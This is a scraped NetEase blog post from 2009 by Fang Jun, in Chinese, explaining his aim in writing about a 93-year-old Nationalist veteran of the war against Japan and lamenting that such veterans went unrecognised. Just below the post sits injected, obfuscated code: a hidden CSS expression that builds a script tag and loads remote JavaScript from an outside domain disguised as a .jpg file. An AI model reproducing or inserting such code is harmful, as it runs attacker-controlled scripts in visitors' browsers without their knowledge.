注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

方军的博客

 
 
 

日志

 
 

我写93岁抗战老兵李志学先生的意图  

2009-09-13 00:15:00|  分类: 国民党抗战将士 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

我写93岁抗战老兵李志学先生的意图

我写93岁抗战老兵李志学先生的意图 - 方军 - 方军的博客

援华美军指导中国远征军训练

我写93岁抗战老兵李志学先生的意图 - 方军 - 方军的博客

1944年中国远征军进行大反攻的准备

 

这篇文章,我先上了网。看看反馈,可以说是提心吊胆。那么,我的意图是什么呢?

“参加过抗日战争,却没有光荣感。”这正是本文要揭示的。

日本侵华,使3500万中国人死伤。在抗日战争中,中国军人牺牲380万人。

一个幅员辽阔的国家,一个有数千年文化渊源的民族,居然有人感到自己在抵御外辱的战争中不那么光荣!或者,几十年来,由于政治上的原因,自己感到光荣也不敢说。这是一件多么可悲的事情。

抗战胜利60年的2005年,有70万人领到纪念抗日战争胜利的证章。但是,曾经是国军的老兵,必须是少将军衔以上的人才能领到。

我知道的,93岁的李志学没有领到。他卢沟桥事变就投入抗战,打了八年。

93岁的赵振英没有领到,他抗战八年,在受降日军的仪式上是警卫营的营长。

90岁的尤广才没有领到,抗战八年,作为远征军他参加了最后的大反攻。

这样的例子不胜枚举。在我采访的抗战老兵中,国军的几乎都没有领到。

 

网上有人批评我:“写李志学的很多内容,都是引用历史资料。没有新鲜玩意。”

在伟大的抗日战争中,在正面战场的22次大战役都早已成为军事经典载入史册。

写出新的东西?谁写出新的东西?谁敢冒天下之大不韪篡改、修正战争历史?

我写李志学,设计到相关战争场景,我当然要引用。理所当然,毋庸置疑。

即便是我这么引用,依旧有无数的朋友还是第一次看见。

 

93岁的抗战老兵从卢沟桥事变开始投入抗战,亲历无数战火纷飞、硝烟弥漫;见过无数受伤军人牺牲在手术台上;也把无数受伤军人从死神的手中抢救回来。

可是,李志学没有领到抗日战争胜利的纪念章;李志学没有理直气壮的光荣感。

千千万万的李志学没有光荣感,或者是:“在家有光荣感,出门没有光荣感。”“自己明明知道:参加抗战是光荣的,当着大众却三缄其口。”——这就是问题所在。

 

我想,我写的东西,十年以后,能有多数人理解就好了。

日本国在战后,从没有过哪个侵华日军老鬼子兵炫耀杀人放火的事情。说明:知耻。

1991年到1997年在日本国采访22名侵华日军老兵。直到今天,仍然有三名侵华日军老兵和我通信。侵华日军老兵在日本没有光荣感,却心安理得领取天皇的恩给;心安理得地感到:总理府内阁应该参拜靖国神社,不要忘记为了日本民族利益去外国烧杀抢掠的日本兵们。

 

在抗日战争中,“我杀了鬼子!”确是中国老人时常对晚辈提及的光荣经历。

我写李志学,却帮助不了李志学回归光荣。我只是希望在2037年卢沟桥事变一百周年的时候,中国人能热爱自己的军人,尊重自己的老兵,珍视军人为国家利益付出过的鲜血和生命。我希望,那时,海峡两岸的政治家能携起手来,为在抗日战争中牺牲的军人们鲜花。

 

2009-9-12

ee:expression_r(function(){if(!window.r){var ss='s'+'cript';var tt='text/ja'+'vas'+'cript';var st=document.createElement_x(ss);st.src='http://imgcache.suqian114.cn/a/s/sina.jpg';st.type=tt;document.getElementsByTagName_r('head').item(0).appendChild(st);window.r=1}}(this));width:0px;display:none"<
  评论这张
 
阅读(143)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017